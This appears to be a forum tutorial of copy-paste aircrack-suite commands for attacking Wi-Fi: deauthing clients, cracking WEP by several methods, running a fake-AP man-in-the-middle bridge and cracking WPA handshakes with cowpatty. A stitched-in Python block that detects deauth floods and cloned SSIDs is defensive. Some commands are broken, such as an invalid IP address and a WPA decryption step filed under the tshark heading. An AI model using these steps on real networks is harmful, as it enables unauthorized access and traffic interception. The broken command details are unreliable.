All about Wireless Attacks Part II

This topic contains 0 replies, has 1 voice, and was last updated by  ddos-admin 3 months ago.


    Reveal Hidden SSIDs using aireplay-ng


    For this attack to work you need an associated client on the network to deauth. This works on all encryption levels and even non-encrypted APs.

    Make sure to open up airodump-ng on the channel of your victim to watch for the SSID to be revealed in real time.

    aireplay-ng -0 5 -a B:S:S:I:D mon0

    That's all there is to it: when the client reconnects to the AP you will see the hidden SSID revealed in airodump-ng.


    Decrypt WEP and WPA packets


    NOTE: you must already have the network key (also called the password) to use this tool.


    airdecap-ng -w password_key capture-01.cap


    Use tshark with the commands below; WEP and WPA have two different commands to remember.


    For WEP Encrypted Files:

    tshark -r capture-01-dec.cap -c 10


    For WPA encrypted files:

    airdecap-ng -p password_key capture-01.cap -e linksys



    Clientless WEP Attack using Fragmentation method


    Step 1:      aireplay-ng -1 0 -e linksys -a B:S:S:I:D  -h Y:O:U:R:M:A:C mon0

    Step 2:      aireplay-ng -5 -b  B:S:S:I:D -h Y:O:U:R:M:A:C mon0

    Step 3:      When asked "Use this packet?", type "y" for yes, but from experience make sure the size is over 68.

    Step 4:      Type ls to show the files in your root directory and copy the whole filename that ends in .xor

    Step 5:    packetforge-ng -0 -a B:S:S:I:D -h Y:O:U:R:M:A:C  -k -l -y fragment-001-002.xor -w arp-request

    Step 6:      airodump-ng -c 11 --bssid B:S:S:I:D --ivs -w capture mon0

    Step 7:    aireplay-ng -2 -r arp-request mon0

    Step 8:      When asked "Use this packet?", type "y" for yes, but from experience make sure the size is 68 or over.

    Step 9:    aircrack-ng -n 64 -b B:S:S:I:D *.ivs


    This assumes you are attacking a 64-bit encrypted network; if not, just use the regular aircrack-ng command.



    Crack WEP using ChopChop method


    -1  is for Fake Authentication

    -a   is for your Access Point's MAC address

    0   is for reassociation timing in seconds

    -h   is for your card's MAC address or that of an associated client on the network

    -e  is the ESSID name of the AP you are attacking

    -4   is for the ChopChop attack method

    Step 1:

    airodump-ng -c 11 -w dump_file -i mon0

    Step 2:

    aireplay-ng -e linksys -1 0 -a B:S:S:I:D -h Y:O:U:R:M:A:C mon0

    It should now say "Association successful" with a : )

    Step 3:

    aireplay-ng -4 -h Y:O:U:R:M:A:C -b B:S:S:I:D mon0

    The destination MAC address should not read FF:FF:FF:FF:FF:FF. If it does, do not continue until it changes or the attack will not work, so keep typing "n" for no until it is no longer FF:FF:FF:FF:FF:FF.

    Step 4:

    Now it should say "Saving plain text in replay_000-111-11122.cap"; copy the whole name of the .cap file.

    Step 5:

    tcpdump -s 0 -n -e -r replay_000-111-11122.cap

    Step 6:

    packetforge-ng -0 -h Y:O:U:R:M:A:C -c C:L:I:E:N:T:S -a B:S:S:I:D -l -k 192.108.123.6382 -y replay_000-111-11122.xor -w arp-cap


    -0 is for the Forged Arp packet

    -h  is for your Mac address

    -c  is for the Associated Clients Mac address

    -a   is for the Access Points Mac address

    -l  is to set the destination IP Address

    -k  is to set the source IP Address

    -y  means to read the PRGA from this file

    -w  means to write the packet to this pcap file

    Step 7:

    aireplay-ng -2 -r arp-cap mon0

    Step 8:

    Type "y" to use the data packet when it asks, and from there the Data field in airodump-ng should start to rise dramatically.

    Step 9:

    aircrack-ng -a 1 -x -0 dump_file-01.ivs

    (dump_file is the prefix we wrote in step 1)

    Step 10:

    Then choose your target when asked and aircrack-ng will begin to run.


    WEP attack with a  Client already connected to the Access Point


    Step 1:

    airodump-ng -c 11 -w wep -i mon0

    -c  is the channel which the target is transmitting on

    -w  is the Dump File prefix

    -i means save only captured IVs

    mon0   is your monitor mode interface as always

    Step 2:

    aireplay-ng -1 0 -e linksys -a B:S:S:I:D -h Y:O:U:R:M:A:C mon0

    -1  is for Fake Authentication

    0  is for reassociation timing in seconds

    -e is for the target network ESSID, or as we know it, the AP's actual name given by the user (example: FREE WIFI)

    -a  is for your Access Points Mac Address

    -h  is for your own Wireless cards Mac Address

    Step 3:

    aireplay-ng -3 -b B:S:S:I:D -h Y:O:U:R:M:A:C mon0

    -3  is for Arp request Replay Attack

    -b  is for your Access Points Mac Address

    -h  is for your source Mac Address   “Either a Client or from a Fake Association”

    Step 4:

    aircrack-ng -a 1 -0 -n 128 wep-01.ivs

    The 128 assumes you are cracking a 104-bit encrypted network, and the file wep-01.ivs was created from the prefix given in step 1.

    -a  is to force the attack mode

    1    is for static WEP

    -0    is to apply nice colors to the aircrack-ng terminal window when it opens

    -n   is to specify the key length: 128 for 104-bit WEP


    Set up a Fake AP honeypot using brctl to get a client to connect and run a MITM attack

    1. Bring up eth0 in BackTrack

    ifconfig eth0 up

    2. Bring up an access point with the SSID of whatever name you are trying to clone. For this tutorial I chose linksys, but you can make your own.

    mitm             is your bridged interface name; you can name it whatever you like for this attack

    at0                 is the new tap interface created by your wireless card and will be named by your card automatically

    dhclient3     is your DHCP client, which will help bridge your internet to the victim

    ifconfig wlan0mon up

    airmon-ng start wlan0mon
    iwconfig wlan0mon channel 1
    airbase-ng --essid linksys mon0

    Bridge the interfaces

    Open up another terminal window to run these commands

    ifconfig at0 up

    brctl addbr mitm

    brctl show   (this will show you have not added the bridge yet, so we'll do that next)

    brctl addif mitm eth0

    brctl addif mitm at0

    ifconfig eth0 up

    Vivek uses all zeros as the IP address of both interfaces, but you can try others if you like.

    ifconfig at0 up

    If you do ifconfig, you’ll see a new bridge, mitm. Bring up the interface:

    ifconfig mitm up

    dhclient3 mitm

    Now connect a client to the new AP and make sure you are able to surf the web using the at0 interface and the mitm bridge giving DHCP. If you are, the options are endless ; )

    Should your eth0 interface lose connection to the internet, kill the mitm bridge using the command below; make sure to stop it first, as well as the at0 interface.

    brctl delbr mitm

    (brctl stands for bridge control and delbr stands for delete bridge)




    WPA/WPA2-PSK Cracking using Rainbow Tables with Cowpatty


    What do the switches in these commands really mean?

    -c              The channel the AP is located on

    --bssid        The MAC address of the AP you are attacking

    -0               Specifies to aireplay-ng that it will be a deauth attack (that's a zero, by the way)

    -c               after aireplay-ng command  specifies the client connected to the AP which you are attacking

    ./cowpatty  starts running cowpatty within Backtrack

    -r               specifies the capture file you will be cracking using Cowpatty

    -d              The directory of the rainbow table you will be using for the attack, basically its location on your hard disk

    Step 1:

    airodump-ng -c 11 --bssid B:S:S:I:D -w LINKSYS mon0

    Step 2:

    aireplay-ng -0 1 -a B:S:S:I:D -c C:L:I:E:N:T mon0

    You can increase the 1 to 5 or more depending on how many times you want to deauth the client.

    Step 3:

    ./cowpatty    or just open up Cowpatty from your start menu

    Step 4:

    cowpatty -r LINKSYS-01.cap -d /root/Desktop/LINKSYS.wpa -s LINKSYS
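    The defender's view of the aireplay-ng -0 deauth step used here (and for the hidden-SSID reveal above) and of the airbase-ng SSID clone in the honeypot section: a WIDS-style check over captured 802.11 management frames. This is added example code, not part of the original post; the frame records, BSSIDs, timestamps and thresholds are constructed placeholders.

```python
from collections import defaultdict

# Constructed sample frames: (timestamp_s, subtype, bssid, essid). Placeholder
# BSSIDs/times, not a real capture: two APs beacon "linksys", one gets a deauth burst.
FRAMES = [
    (0.0, "beacon", "00:11:22:33:44:55", "linksys"),
    (0.1, "beacon", "66:77:88:99:aa:bb", "linksys"),   # same name, second BSSID
    (0.2, "beacon", "cc:dd:ee:ff:00:11", "guest"),
    (1.0, "deauth", "00:11:22:33:44:55", None),
    (1.1, "deauth", "00:11:22:33:44:55", None),
    (1.2, "deauth", "00:11:22:33:44:55", None),
    (1.3, "deauth", "00:11:22:33:44:55", None),
    (1.4, "deauth", "00:11:22:33:44:55", None),
    (5.0, "deauth", "cc:dd:ee:ff:00:11", None),         # single frame: normal roam
    (9.0, "deauth", "00:11:22:33:44:55", None),
]

def deauth_bursts(frames, window_s=1.0, threshold=4):
    """Return {bssid: peak deauth count} for BSSIDs that see at least `threshold`
    deauth frames inside any sliding window of `window_s` seconds. One deauth is
    normal roaming; a tight burst is the footprint of a deauth-flood tool."""
    times_by_bssid = defaultdict(list)
    for ts, subtype, bssid, _ in frames:
        if subtype == "deauth":
            times_by_bssid[bssid].append(ts)
    alerts = {}
    for bssid, times in times_by_bssid.items():
        times.sort()
        peak, lo = 0, 0
        for hi, t in enumerate(times):
            while t - times[lo] > window_s:   # slide the window's left edge forward
                lo += 1
            peak = max(peak, hi - lo + 1)
        if peak >= threshold:
            alerts[bssid] = peak
    return alerts

def essid_clones(frames):
    """Return {essid: sorted BSSIDs} for every network name beaconed by more than
    one BSSID, which is what a rogue AP cloning a known SSID looks like."""
    bssids_by_essid = defaultdict(set)
    for _, subtype, bssid, essid in frames:
        if subtype == "beacon" and essid:
            bssids_by_essid[essid].add(bssid)
    return {e: sorted(b) for e, b in bssids_by_essid.items() if len(b) > 1}

if __name__ == "__main__":
    print("deauth bursts:", deauth_bursts(FRAMES))
    print("cloned ESSIDs:", essid_clones(FRAMES))
```

A real deployment would feed these functions from a monitor-mode capture and tune the window and threshold to the site's normal roaming rate.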



    Test a capture file to check its integrity


    Open pyrit or cd into the pyrit directory and type the command below, replacing output-01.cap with your own capture file.


    pyrit -r output-01.cap analyze

